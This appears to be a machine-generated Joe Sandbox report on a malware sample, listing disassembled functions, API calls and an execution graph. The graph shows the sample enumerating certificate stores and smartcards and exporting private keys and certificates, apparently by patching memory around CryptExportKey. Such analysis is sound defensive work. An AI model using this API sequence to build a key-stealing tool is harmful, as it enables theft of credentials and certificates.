                                                                                                        • Instruction ID: 9be9b3c6779dbc4fec803037c48c4e54be1ef0d9e37ab80a9898581bd6dc0544
                                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                        • Instruction Fuzzy Hash: 5C527974A00229DFDB64CF58C984BA8BBB1BF09314F1481E9E50DAB391DB34AE94DF54
                                                                                                        Function 00700E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 85 700e0f-700e24 SetErrorMode * 2 86 700e26 85->86 87 700e2b-700e2c 85->87 86->87
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00700223,?,?), ref: 00700E19
                                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00700223,?,?), ref: 00700E1E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2519523064.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_700000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 2340568224-0
                                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction ID: 363d1c857498136fbe31aee574387ff28b79b8b4375f79cccd03c8d3e1615692
                                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                        • Instruction Fuzzy Hash: AED01231145128B7D7003A94DC09BCD7B5CDF05B62F008411FB0DE9080C774994046E5
                                                                                                        Function 0074EE25 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 88 74ee25-74ee3e 89 74ee40-74ee42 88->89 90 74ee44 89->90 91 74ee49-74ee55 89->91 90->91 93 74ee65-74ee72 Module32First 91->93 94 74ee57-74ee5d 91->94 95 74ee74-74ee75 call 74eae4 93->95 96 74ee7b-74ee83 93->96 94->93 100 74ee5f-74ee63 94->100 101 74ee7a 95->101 100->89 100->93 101->96
                                                                                                        APIs
                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0074EE6D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_73d000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FirstModule32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3757679902-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 73bd893be36d1ce9137fff633f00bdfaa8406ee357451ded9a54f04e41984f8c
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 66F09036600721AFE7203BF9A88DB6F76ECBF49734F140929F642910C0DB78EC458A61
                                                                                                        Function 0074EAE4 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 102 74eae4-74eb1e call 74edf7 105 74eb20-74eb53 VirtualAlloc call 74eb71 102->105 106 74eb6c 102->106 108 74eb58-74eb6a 105->108 106->106 108->106
                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0074EB35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_73d000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: cc6543566534702e374c0188285a9f11e004eff51307f22052e6dc6ee33fc041
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 86112B79A00208EFDB01DF98C985E99BBF5EF08351F0580A4F9489B362D375EA50DF90

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:23.2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:37.8%
                                                                                                        Total number of Nodes:862
                                                                                                        Total number of Limit Nodes:32
                                                                                                        execution_graph 4505 7ff7327a6758 4506 7ff7327a677b 4505->4506 4507 7ff7327a7234 5 API calls 4506->4507 4508 7ff7327a67ea 4507->4508 4509 7ff7327a7234 5 API calls 4508->4509 4510 7ff7327a6859 4509->4510 4511 7ff7327a7234 5 API calls 4510->4511 4512 7ff7327a6878 4511->4512 4513 7ff7327a7234 5 API calls 4512->4513 4514 7ff7327a6897 4513->4514 4515 7ff7327a7234 5 API calls 4514->4515 4516 7ff7327a68b6 4515->4516 4274 7ff7327a2b1c 4275 7ff7327a1990 4 API calls 4274->4275 4276 7ff7327a2b42 4275->4276 4277 7ff7327a19e4 4 API calls 4276->4277 4278 7ff7327a2b4d 4277->4278 4279 7ff7327a1990 4 API calls 4278->4279 4280 7ff7327a2b5c 4279->4280 4281 7ff7327a1990 4 API calls 4280->4281 4282 7ff7327a2b6b CertEnumSystemStore 4281->4282 4283 7ff7327a1990 4 API calls 4282->4283 4284 7ff7327a2b94 4283->4284 4517 7ff7327a639c 4518 7ff7327a63c7 4517->4518 4518->4518 4519 7ff7327a7234 5 API calls 4518->4519 4520 7ff7327a6449 4519->4520 4521 7ff7327a7234 5 API calls 4520->4521 4522 7ff7327a6468 4521->4522 4523 7ff7327a7234 5 API calls 4522->4523 4524 7ff7327a6487 4523->4524 4525 7ff7327a7234 5 API calls 4524->4525 4526 7ff7327a64ed 4525->4526 4527 7ff7327a7234 5 API calls 4526->4527 4528 7ff7327a650c 4527->4528 4529 7ff7327a7234 5 API calls 4528->4529 4530 7ff7327a652b 4529->4530 4555 7ff7327a7298 4530->4555 4532 7ff7327a654a 4533 7ff7327a7234 5 API calls 4532->4533 4534 7ff7327a6569 4533->4534 4535 7ff7327a7234 5 API calls 4534->4535 4536 7ff7327a6588 4535->4536 4537 7ff7327a7234 5 API calls 4536->4537 4538 7ff7327a65f7 4537->4538 4539 7ff7327a7234 5 API calls 4538->4539 4540 7ff7327a6616 4539->4540 4541 7ff7327a72d4 5 API calls 4540->4541 4542 7ff7327a6635 4541->4542 4543 7ff7327a72d4 5 API calls 4542->4543 4544 7ff7327a6654 4543->4544 4545 7ff7327a72d4 5 API calls 4544->4545 4546 7ff7327a66b7 4545->4546 4547 7ff7327a7234 5 API calls 4546->4547 4548 7ff7327a66d6 4547->4548 4549 7ff7327a7234 5 API calls 4548->4549 4550 7ff7327a66f5 4549->4550 4551 7ff7327a7234 5 API calls 4550->4551 4552 7ff7327a6714 4551->4552 4553 7ff7327a7234 5 API calls 4552->4553 4554 7ff7327a6733 4553->4554 4556 7ff7327a7310 5 API calls 4555->4556 4557 7ff7327a72b5 4556->4557 4558 7ff7327a72ce 4557->4558 4559 7ff7327a1a70 5 API calls 4557->4559 4558->4532 4559->4558 4575 7ff7327a6d30 4576 7ff7327a6d51 4575->4576 4576->4576 4577 7ff7327a7234 5 API calls 4576->4577 4578 7ff7327a6dc0 4577->4578 4579 7ff7327a7234 5 API calls 4578->4579 4580 7ff7327a6e2d 4579->4580 4581 7ff7327a72d4 5 API calls 4580->4581 4582 7ff7327a6e4c 4581->4582 4591 7ff7327a71ec 4582->4591 4584 7ff7327a6e6b 4585 7ff7327a71ec 5 API calls 4584->4585 4586 7ff7327a6edd 4585->4586 4587 7ff7327a7234 5 API calls 4586->4587 4588 7ff7327a6f42 4587->4588 4589 7ff7327a7234 5 API calls 4588->4589 4590 7ff7327a6fa0 4589->4590 4592 7ff7327a7310 5 API calls 4591->4592 4593 7ff7327a7209 4592->4593 4594 7ff7327a722e 4593->4594 4595 7ff7327a1990 4 API calls 4593->4595 4594->4584 4595->4594 4596 7ff7327a6270 4597 7ff7327a6293 4596->4597 4597->4597 4598 7ff7327a7234 5 API calls 4597->4598 4599 7ff7327a6302 4598->4599 4600 7ff7327a7234 5 API calls 4599->4600 4601 7ff7327a6321 4600->4601 4602 7ff7327a7234 5 API calls 4601->4602 4603 7ff7327a6340 4602->4603 4604 7ff7327a7234 5 API calls 4603->4604 4605 7ff7327a635f 4604->4605 4606 7ff7327a7234 5 API calls 4605->4606 4607 7ff7327a637e 4606->4607 3976 7ff7327a1968 3979 7ff7327a25dc GetProcessHeap HeapAlloc 3976->3979 4615 7ff7327ab428 4616 7ff7327ab44b 4615->4616 4617 7ff7327a1990 4 API calls 4616->4617 4618 7ff7327ab456 4617->4618 4619 7ff7327a1990 4 API calls 4618->4619 4620 7ff7327ab465 4619->4620 4621 7ff7327ab486 4620->4621 4622 7ff7327ab889 4620->4622 4623 7ff7327ab4af 4621->4623 4624 7ff7327ab736 4621->4624 4625 7ff7327a1990 4 API calls 4622->4625 4627 7ff7327a1990 4 API calls 4623->4627 4628 7ff7327a1990 4 API calls 4624->4628 4626 7ff7327ab89d 4625->4626 4629 7ff7327a1990 4 API calls 4626->4629 4667 7ff7327ab4bf 4627->4667 4630 7ff7327ab746 4628->4630 4631 7ff7327ab8b1 4629->4631 4634 7ff7327a1990 4 API calls 4630->4634 4632 7ff7327a1a70 5 API calls 4631->4632 4635 7ff7327ab887 4632->4635 4633 7ff7327ab725 4636 7ff7327a1990 4 API calls 4633->4636 4637 7ff7327ab75a 4634->4637 4638 7ff7327a1990 4 API calls 4635->4638 4641 7ff7327ab734 4636->4641 4639 7ff7327a1a70 5 API calls 4637->4639 4640 7ff7327ab8d2 4638->4640 4639->4641 4642 7ff7327a1990 4 API calls 4641->4642 4643 7ff7327ab780 SCardListCardsW 4642->4643 4644 7ff7327ab842 4643->4644 4645 7ff7327ab7b9 4643->4645 4647 7ff7327a1990 4 API calls 4644->4647 4648 7ff7327a1990 4 API calls 4645->4648 4646 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4646->4667 4649 7ff7327ab852 4647->4649 4660 7ff7327ab7c9 4648->4660 4652 7ff7327a1990 4 API calls 4649->4652 4650 7ff7327ab52b SCardGetStatusChangeW 4650->4667 4651 7ff7327ab824 4653 7ff7327a1990 4 API calls 4651->4653 4654 7ff7327ab866 4652->4654 4655 7ff7327ab833 SCardFreeMemory 4653->4655 4656 7ff7327a1a70 5 API calls 4654->4656 4657 7ff7327ab878 4655->4657 4656->4657 4659 7ff7327a1990 4 API calls 4657->4659 4658 7ff7327a19e4 4 API calls 4658->4660 4659->4635 4660->4651 4660->4658 4661 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4660->4661 4661->4660 4662 7ff7327a1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4662->4667 4663 7ff7327ab5bf SCardListCardsW 4663->4667 4664 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4664->4667 4665 7ff7327a1990 4 API calls 4666 7ff7327ab676 SCardFreeMemory 4665->4666 4666->4667 4667->4633 4667->4646 4667->4650 4667->4662 4667->4663 4667->4664 4667->4665 4285 7ff7327a2bac 4286 7ff7327a2bc5 4285->4286 4287 7ff7327a1990 4 API calls 4286->4287 4288 7ff7327a2bdc 4287->4288 4289 7ff7327a19e4 4 API calls 4288->4289 4290 7ff7327a2bec 4289->4290 4291 7ff7327a1990 4 API calls 4290->4291 4292 7ff7327a2c00 CertOpenStore 4291->4292 4293 7ff7327a2c24 4292->4293 4297 7ff7327a2c48 4292->4297 4294 7ff7327a1990 4 API calls 4293->4294 4295 7ff7327a2c38 4294->4295 4300 7ff7327a2d5c CertEnumCertificatesInStore 4295->4300 4297->4297 4298 7ff7327a1990 4 API calls 4297->4298 4299 7ff7327a2cbd CertCloseStore 4298->4299 4301 7ff7327a319c 4300->4301 4307 7ff7327a2daa 4300->4307 4303 7ff7327a31ad 4301->4303 4304 7ff7327a25b4 2 API calls 4301->4304 4302 7ff7327a2db0 CertGetNameStringW 4302->4307 4303->4297 4304->4303 4305 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4305->4307 4306 7ff7327a19e4 4 API calls 4306->4307 4307->4302 4307->4305 4307->4306 4308 7ff7327a1990 4 API calls 4307->4308 4309 7ff7327a2e8e CertNameToStrW 4308->4309 4311 7ff7327a2eca 4309->4311 4310 7ff7327a1990 4 API calls 4310->4311 4311->4310 4312 7ff7327a19e4 4 API calls 4311->4312 4313 7ff7327a1990 4 API calls 4311->4313 4312->4311 4314 7ff7327a2eec CertNameToStrW 4313->4314 4316 7ff7327a2f1c 4314->4316 4315 7ff7327a1990 4 API calls 4315->4316 4316->4315 4317 7ff7327a19e4 4 API calls 4316->4317 4318 7ff7327a1990 4 API calls 4316->4318 4317->4316 4319 7ff7327a2f3e FileTimeToSystemTime 4318->4319 4320 7ff7327a2f84 4319->4320 4321 7ff7327a1a70 5 API calls 4320->4321 4322 7ff7327a2faf FileTimeToSystemTime 4321->4322 4326 7ff7327a2ffa 4322->4326 4323 7ff7327a79f0 2 API calls 4323->4326 4324 7ff7327a1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4324->4326 4325 7ff7327a25b4 2 API calls 4325->4326 4326->4323 4326->4324 4326->4325 4328 7ff7327a1990 4 API calls 4326->4328 4333 7ff7327a308d 4326->4333 4329 7ff7327a316e CertEnumCertificatesInStore 4328->4329 4329->4301 4329->4302 4330 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4330->4333 4332 7ff7327a25b4 2 API calls 4332->4333 4333->4326 4333->4330 4333->4332 4334 7ff7327a25b4 2 API calls 4333->4334 4335 7ff7327a3220 CertGetCertificateContextProperty 4333->4335 4362 7ff7327aa778 4333->4362 4334->4326 4336 7ff7327a348c 4335->4336 4337 7ff7327a326c CryptAcquireCertificatePrivateKey 4335->4337 4336->4333 4337->4336 4338 7ff7327a329b 4337->4338 4339 7ff7327a32b4 CryptGetUserKey 4338->4339 4340 7ff7327a34a9 OpenSCManagerA 4338->4340 4339->4336 4341 7ff7327a32c9 4339->4341 4342 7ff7327a34dd 4340->4342 4366 7ff7327a36f0 4341->4366 4344 7ff7327a34fb 6 API calls 4342->4344 4345 7ff7327a35d1 4344->4345 4376 7ff7327a25dc GetProcessHeap HeapAlloc 4345->4376 4346 7ff7327a32e5 4346->4336 4349 7ff7327a3333 LoadLibraryA 4346->4349 4351 7ff7327a335f 4349->4351 4350 7ff7327a361d 4353 7ff7327a3652 CertOpenStore CertAddCertificateLinkToStore CertSetCertificateContextProperty PFXExportCertStoreEx 4350->4353 4352 7ff7327a337a GetProcAddress VirtualProtect 4351->4352 4355 7ff7327a33c1 4352->4355 4377 7ff7327a25dc GetProcessHeap HeapAlloc 4353->4377 4357 7ff7327a33d0 VirtualProtect CryptExportKey 4355->4357 4357->4336 4358 7ff7327a340e VirtualProtect 4357->4358 4374 7ff7327a262c 4358->4374 4360 7ff7327a3432 VirtualProtect CryptAcquireContextA 4360->4336 4361 7ff7327a3463 CryptImportKey 4360->4361 4361->4336 4361->4350 4363 7ff7327aa7a0 4362->4363 4379 7ff7327a25dc GetProcessHeap HeapAlloc 4363->4379 4367 7ff7327a3728 CryptExportKey 4366->4367 4372 7ff7327a370f 4366->4372 4368 7ff7327a37ac 4367->4368 4369 7ff7327a374e 4367->4369 4378 7ff7327a25dc GetProcessHeap HeapAlloc 4368->4378 4371 7ff7327a37a8 4369->4371 4373 7ff7327a3766 CryptExportKey 4369->4373 4371->4346 4372->4367 4373->4368 4373->4371 4375 7ff7327a2634 4374->4375 4375->4360 4375->4375 4668 7ff7327a5fac 4669 7ff7327a5fc2 4668->4669 4670 7ff7327a7234 5 API calls 4669->4670 4671 7ff7327a5ff0 4670->4671 4672 7ff7327a69ec 4673 7ff7327a6a0f 4672->4673 4673->4673 4674 7ff7327a7234 5 API calls 4673->4674 4675 7ff7327a6a7e 4674->4675 4676 7ff7327a7234 5 API calls 4675->4676 4677 7ff7327a6aed 4676->4677 4678 7ff7327a72d4 5 API calls 4677->4678 4679 7ff7327a6b0c 4678->4679 4680 7ff7327ae3ac lstrcpyW PathAppendW 4681 7ff7327ae423 4680->4681 4696 7ff7327accf8 RegGetValueW 4681->4696 4684 7ff7327ae4ba 4685 7ff7327a1990 4 API calls 4686 7ff7327ae476 4685->4686 4687 7ff7327a19e4 4 API calls 4686->4687 4688 7ff7327ae481 4687->4688 4689 7ff7327a1990 4 API calls 4688->4689 4690 7ff7327ae490 4689->4690 4691 7ff7327a19e4 4 API calls 4690->4691 4692 7ff7327ae49f 4691->4692 4693 7ff7327a1990 4 API calls 4692->4693 4694 7ff7327ae4ae 4693->4694 4695 7ff7327a25b4 2 API calls 4694->4695 4695->4684 4697 7ff7327acd41 4696->4697 4698 7ff7327acd80 4696->4698 4703 7ff7327a2588 GetProcessHeap HeapAlloc 4697->4703 4698->4684 4698->4685 3954 7ff7327a31c4 3955 7ff7327a31d7 3954->3955 3962 7ff7327a1990 3955->3962 3957 7ff7327a31e2 3958 7ff7327a1990 4 API calls 3957->3958 3959 7ff7327a31f1 CertEnumSystemStoreLocation 3958->3959 3960 7ff7327a1990 4 API calls 3959->3960 3961 7ff7327a3215 3960->3961 3963 7ff7327a19ad 3962->3963 3966 7ff7327a1918 3963->3966 3965 7ff7327a19ba 3965->3957 3967 7ff7327a1951 3966->3967 3968 7ff7327a192e 3966->3968 3967->3965 3968->3968 3970 7ff7327a2654 3968->3970 3971 7ff7327a2682 3970->3971 3972 7ff7327a2669 GetProcessHeap RtlReAllocateHeap 3970->3972 3975 7ff7327a25dc GetProcessHeap HeapAlloc 3971->3975 3973 7ff7327a268a 3972->3973 3973->3967 4704 7ff7327ae604 lstrcpyW PathAppendW 4705 7ff7327ae644 4704->4705 4706 7ff7327accf8 6 API calls 4705->4706 4708 7ff7327ae660 4706->4708 4707 7ff7327ae6cb 4708->4707 4709 7ff7327a1990 4 API calls 4708->4709 4710 7ff7327ae67c 4709->4710 4711 7ff7327a19e4 4 API calls 4710->4711 4712 7ff7327ae687 4711->4712 4713 7ff7327a1990 4 API calls 4712->4713 4714 7ff7327ae69f 4713->4714 4715 7ff7327a19e4 4 API calls 4714->4715 4716 7ff7327ae6af 4715->4716 4717 7ff7327a1990 4 API calls 4716->4717 4718 7ff7327ae6be 4717->4718 4719 7ff7327a25b4 2 API calls 4718->4719 4719->4707 4720 7ff7327a61f8 4721 7ff7327a620e 4720->4721 4722 7ff7327a7234 5 API calls 4721->4722 4723 7ff7327a623c 4722->4723 4724 7ff7327a7234 5 API calls 4723->4724 4725 7ff7327a625c 4724->4725 4380 7ff7327a73fc 4381 7ff7327a743f 4380->4381 4382 7ff7327a1990 4 API calls 4381->4382 4383 7ff7327a746e 4382->4383 4384 7ff7327a1a70 5 API calls 4383->4384 4385 7ff7327a7490 4384->4385 4386 7ff7327a1a70 5 API calls 4385->4386 4387 7ff7327a74a4 4386->4387 4428 7ff7327a78ec 4387->4428 4390 7ff7327a1990 4 API calls 4391 7ff7327a74c5 4390->4391 4392 7ff7327a1a70 5 API calls 4391->4392 4393 7ff7327a74d9 4392->4393 4434 7ff7327a79c4 GetNativeSystemInfo 4393->4434 4396 7ff7327a1990 4 API calls 4397 7ff7327a74fa 4396->4397 4436 7ff7327a7138 CoInitializeEx CoInitializeSecurity CoCreateInstance 4397->4436 4399 7ff7327a7503 4404 7ff7327a75d1 4399->4404 4437 7ff7327a785c 4399->4437 4400 7ff7327a783c 4448 7ff7327a7104 4400->4448 4404->4400 4405 7ff7327a785c 5 API calls 4404->4405 4408 7ff7327a7629 4405->4408 4406 7ff7327a755b 4407 7ff7327a785c 5 API calls 4406->4407 4410 7ff7327a7596 4407->4410 4409 7ff7327a785c 5 API calls 4408->4409 4412 7ff7327a7664 4409->4412 4411 7ff7327a785c 5 API calls 4410->4411 4411->4404 4413 7ff7327a785c 5 API calls 4412->4413 4414 7ff7327a769f 4413->4414 4415 7ff7327a785c 5 API calls 4414->4415 4416 7ff7327a76da 4415->4416 4417 7ff7327a785c 5 API calls 4416->4417 4418 7ff7327a7715 4417->4418 4419 7ff7327a785c 5 API calls 4418->4419 4420 7ff7327a7750 4419->4420 4421 7ff7327a785c 5 API calls 4420->4421 4422 7ff7327a778b 4421->4422 4423 7ff7327a785c 5 API calls 4422->4423 4424 7ff7327a77c6 4423->4424 4425 7ff7327a785c 5 API calls 4424->4425 4426 7ff7327a7801 4425->4426 4427 7ff7327a785c 5 API calls 4426->4427 4427->4400 4429 7ff7327a7918 4428->4429 4429->4429 4430 7ff7327a7977 LoadLibraryA GetProcAddress 4429->4430 4431 7ff7327a7991 GetCurrentProcess IsWow64Process 4430->4431 4432 7ff7327a74a9 4430->4432 4431->4432 4433 7ff7327a79ad 4431->4433 4432->4390 4433->4432 4435 7ff7327a74de 4434->4435 4435->4396 4436->4399 4438 7ff7327a1990 4 API calls 4437->4438 4439 7ff7327a7888 4438->4439 4440 7ff7327a1990 4 API calls 4439->4440 4441 7ff7327a7893 4440->4441 4442 7ff7327a1990 4 API calls 4441->4442 4443 7ff7327a78a2 4442->4443 4451 7ff7327a7034 4443->4451 4446 7ff7327a1990 4 API calls 4447 7ff7327a78d5 4446->4447 4447->4406 4449 7ff7327a7116 CoUninitialize 4448->4449 4452 7ff7327a7079 4451->4452 4453 7ff7327a707d 4452->4453 4457 7ff7327a6004 4452->4457 4461 7ff7327a6b28 4452->4461 4467 7ff7327a68d4 4452->4467 4453->4446 4458 7ff7327a601a 4457->4458 4477 7ff7327a7234 4458->4477 4462 7ff7327a6b3e 4461->4462 4463 7ff7327a7234 5 API calls 4462->4463 4464 7ff7327a6b66 4463->4464 4465 7ff7327a7234 5 API calls 4464->4465 4466 7ff7327a6b80 4465->4466 4468 7ff7327a68f7 4467->4468 4468->4468 4469 7ff7327a7234 5 API calls 4468->4469 4470 7ff7327a6971 4469->4470 4471 7ff7327a7234 5 API calls 4470->4471 4472 7ff7327a6990 4471->4472 4473 7ff7327a7234 5 API calls 4472->4473 4474 7ff7327a69af 4473->4474 4500 7ff7327a72d4 4474->4500 4486 7ff7327a7310 4477->4486 4480 7ff7327a6042 4481 7ff7327a7260 4484 7ff7327a1990 4 API calls 4481->4484 4482 7ff7327a1990 4 API calls 4483 7ff7327a7275 4482->4483 4485 7ff7327a19e4 4 API calls 4483->4485 4484->4480 4485->4481 4487 7ff7327a733e 4486->4487 4489 7ff7327a7381 4487->4489 4490 7ff7327a7362 4487->4490 4488 7ff7327a73bb 4492 7ff7327a1990 4 API calls 4488->4492 4489->4488 4491 7ff7327a7395 4489->4491 4494 7ff7327a1a70 5 API calls 4490->4494 4498 7ff7327a1a70 5 API calls 4491->4498 4493 7ff7327a73ca 4492->4493 4495 7ff7327a1990 4 API calls 4493->4495 4496 7ff7327a7251 4494->4496 4497 7ff7327a73d5 4495->4497 4496->4480 4496->4481 4496->4482 4499 7ff7327a1990 4 API calls 4497->4499 4498->4496 4499->4496 4501 7ff7327a7310 5 API calls 4500->4501 4502 7ff7327a72f1 4501->4502 4503 7ff7327a69ce 4502->4503 4504 7ff7327a1a70 5 API calls 4502->4504 4504->4503 4726 7ff7327ac37c 4727 7ff7327ac38f 4726->4727 4728 7ff7327a1990 4 API calls 4727->4728 4729 7ff7327ac39a 4728->4729 4744 7ff7327ac548 4729->4744 4828 7ff7327ae944 4744->4828 4849 7ff7327a25dc GetProcessHeap HeapAlloc 4828->4849 4937 7ff7327aecbc 4938 7ff7327aee07 4937->4938 4939 7ff7327aecea 4937->4939 4939->4938 4951 7ff7327a25dc GetProcessHeap HeapAlloc 4939->4951 4960 7ff7327a14d4 4961 7ff7327a1507 4960->4961 4962 7ff7327a14ea 4960->4962 4962->4961 4963 7ff7327a1501 RemoveVectoredExceptionHandler 4962->4963 4963->4961 4964 7ff7327a6054 4965 7ff7327a6077 4964->4965 4965->4965 4966 7ff7327a7234 5 API calls 4965->4966 4967 7ff7327a60f1 4966->4967 4968 7ff7327a7234 5 API calls 4967->4968 4969 7ff7327a6110 4968->4969 4970 7ff7327a7234 5 API calls 4969->4970 4971 7ff7327a612f 4970->4971 4972 7ff7327a7234 5 API calls 4971->4972 4973 7ff7327a619e 4972->4973 4974 7ff7327a7234 5 API calls 4973->4974 4975 7ff7327a61bd 4974->4975 4976 7ff7327a72d4 5 API calls 4975->4976 4977 7ff7327a61dc 4976->4977 4978 7ff7327ae4d4 lstrcpyW PathAppendW 4979 7ff7327ae520 4978->4979 4980 7ff7327accf8 6 API calls 4979->4980 4982 7ff7327ae53b 4980->4982 4981 7ff7327ae5ee 4982->4981 4983 7ff7327a1990 4 API calls 4982->4983 4984 7ff7327ae55a 4983->4984 4985 7ff7327a19e4 4 API calls 4984->4985 4986 7ff7327ae565 4985->4986 4987 7ff7327a1990 4 API calls 4986->4987 4988 7ff7327ae57c 4987->4988 4989 7ff7327a19e4 4 API calls 4988->4989 4990 7ff7327ae58b 4989->4990 4990->4990 4991 7ff7327a1990 4 API calls 4990->4991 4992 7ff7327ae5e2 4991->4992 4993 7ff7327a25b4 2 API calls 4992->4993 4993->4981 3980 7ff7327a9ac8 3981 7ff7327a9af7 3980->3981 3982 7ff7327a1990 4 API calls 3981->3982 3983 7ff7327a9b02 3982->3983 4117 7ff7327a9644 3983->4117 3985 7ff7327a9b0b 3985->3985 4122 7ff7327a900c 3985->4122 3988 7ff7327aa4e7 3990 7ff7327a1990 4 API calls 3988->3990 3991 7ff7327aa4ff 3990->3991 3992 7ff7327a9b7d 3992->3988 4157 7ff7327a97dc 3992->4157 3995 7ff7327a1990 4 API calls 3996 7ff7327a9bb7 3995->3996 3997 7ff7327a97dc 16 API calls 3996->3997 3998 7ff7327a9bcf 3997->3998 3998->3988 3999 7ff7327a1990 4 API calls 3998->3999 4000 7ff7327a9be2 3999->4000 4001 7ff7327a97dc 16 API calls 4000->4001 4002 7ff7327a9bfa 4001->4002 4002->3988 4003 7ff7327a1990 4 API calls 4002->4003 4004 7ff7327a9c0d 4003->4004 4005 7ff7327a97dc 16 API calls 4004->4005 4006 7ff7327a9c25 4005->4006 4006->3988 4007 7ff7327a1990 4 API calls 4006->4007 4008 7ff7327a9c38 4007->4008 4009 7ff7327a97dc 16 API calls 4008->4009 4010 7ff7327a9c50 4009->4010 4010->3988 4011 7ff7327a1990 4 API calls 4010->4011 4012 7ff7327a9c63 4011->4012 4013 7ff7327a97dc 16 API calls 4012->4013 4014 7ff7327a9c7b 4013->4014 4014->3988 4015 7ff7327a1990 4 API calls 4014->4015 4016 7ff7327a9c8e 4015->4016 4017 7ff7327a97dc 16 API calls 4016->4017 4018 7ff7327a9ca6 4017->4018 4018->3988 4019 7ff7327a1990 4 API calls 4018->4019 4020 7ff7327a9cb9 4019->4020 4021 7ff7327a97dc 16 API calls 4020->4021 4022 7ff7327a9cd1 4021->4022 4022->3988 4023 7ff7327a1990 4 API calls 4022->4023 4024 7ff7327a9ce4 4023->4024 4025 7ff7327a97dc 16 API calls 4024->4025 4026 7ff7327a9cfc 4025->4026 4026->3988 4027 7ff7327a1990 4 API calls 4026->4027 4028 7ff7327a9d0f 4027->4028 4029 7ff7327a97dc 16 API calls 4028->4029 4030 7ff7327a9d27 4029->4030 4030->3988 4031 7ff7327a1990 4 API calls 4030->4031 4032 7ff7327a9d3a 4031->4032 4033 7ff7327a97dc 16 API calls 4032->4033 4034 7ff7327a9d52 4033->4034 4034->3988 4035 7ff7327a1990 4 API calls 4034->4035 4036 7ff7327a9d65 4035->4036 4037 7ff7327a97dc 16 API calls 4036->4037 4038 7ff7327a9d7d 4037->4038 4038->3988 4039 7ff7327a1990 4 API calls 4038->4039 4040 7ff7327a9d90 4039->4040 4041 7ff7327a97dc 16 API calls 4040->4041 4042 7ff7327a9da8 4041->4042 4042->3988 4043 7ff7327a1990 4 API calls 4042->4043 4044 7ff7327a9dbb 4043->4044 4045 7ff7327a97dc 16 API calls 4044->4045 4046 7ff7327a9dd3 4045->4046 4046->3988 4047 7ff7327a1990 4 API calls 4046->4047 4048 7ff7327a9de6 4047->4048 4048->4048 4049 7ff7327a97dc 16 API calls 4048->4049 4050 7ff7327a9e4c 4049->4050 4050->3988 4051 7ff7327a1990 4 API calls 4050->4051 4052 7ff7327a9e5f 4051->4052 4052->4052 4053 7ff7327a97dc 16 API calls 4052->4053 4054 7ff7327a9eba 4053->4054 4054->3988 4055 7ff7327a1990 4 API calls 4054->4055 4056 7ff7327a9ecd 4055->4056 4056->4056 4057 7ff7327a97dc 16 API calls 4056->4057 4058 7ff7327a9f2f 4057->4058 4058->3988 4059 7ff7327a1990 4 API calls 4058->4059 4060 7ff7327a9f42 4059->4060 